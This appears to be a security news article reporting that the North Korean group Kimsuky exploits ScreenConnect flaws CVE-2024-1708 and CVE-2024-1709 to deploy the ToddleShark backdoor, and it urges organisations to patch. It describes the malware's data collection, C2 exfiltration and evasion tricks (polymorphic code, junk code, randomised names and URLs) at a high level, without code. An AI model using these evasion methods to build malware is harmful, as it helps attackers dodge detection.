Source: Claire Williams via Alamy Stock Photo
North Korean hackers are using a critical vulnerability in ConnectWise's ScreenConnect software to spread new, shapeshifting espionage malware.
Two weeks ago, ConnectWise revealed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug given a "high" score of 8.4 out of 10 on the CVSS scale, and CVE-2024-1709, a rare "critical" 10 out of 10 authentication bypass bug. With hardly a moment to spare, cyberattackers pounced — most notably, initial access brokers (IABs) in cahoots with ransomware groups — with thousands of organizations in the firing line.
Kimsuky (aka APT43), the advanced persistent threat (APT) from the Democratic People's Republic of Korea (DPRK), is getting in on the action, too. According to a new blog post from Kroll, it's exploiting ScreenConnect to deploy a new backdoor called "ToddleShark."
"The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing," according to Kroll. "Patching ScreenConnect applications is therefore imperative."
ToddleShark builds off of previous Kimsuky malware but stands out for its approach to anti-detection.
North Korea Exploits ScreenConnect
In recent espionage campaigns, Kimsuky has deployed various custom backdoors, including ReconShark and BabyShark, against government organizations, research centers, think tanks, and universities in North America, Europe, and Asia.
ToddleShark, the weapon of choice this time around, is notably similar to BabyShark, but it has certain important advancements.
Among other functions, ToddleShark gathers system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.
It then sends that information back to attacker-controlled command-and-control (C2) servers via cryptographically protected Privacy-Enhanced Mail (PEM) certificates.
"The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments," Kroll researchers said in their post, released today.
How ToddleShark Uses Randomness for Evasion
ToddleShark stands out most, though, for how it uses random generation algorithms to dodge detection. For example, it uses random names for variables and functions to stump static detection, and randomizes its strings and the ordering of code to confuse standard signature-based detection.
Interspersed with its regular malicious code are large chunks of junk code, and hexadecimal encoded code, making the final outcome look like a bit of a mess.
Blocklisting doesn't really work against ToddleShark, either, because the hash of the initial payload and URLs used to download additional stages of the malware are always different.
The fact that detecting this backdoor is so tricky only emphasizes the need for organizations to update, if they haven't already. A patch and other resources for ConnectWise customers are available on the vendor's website.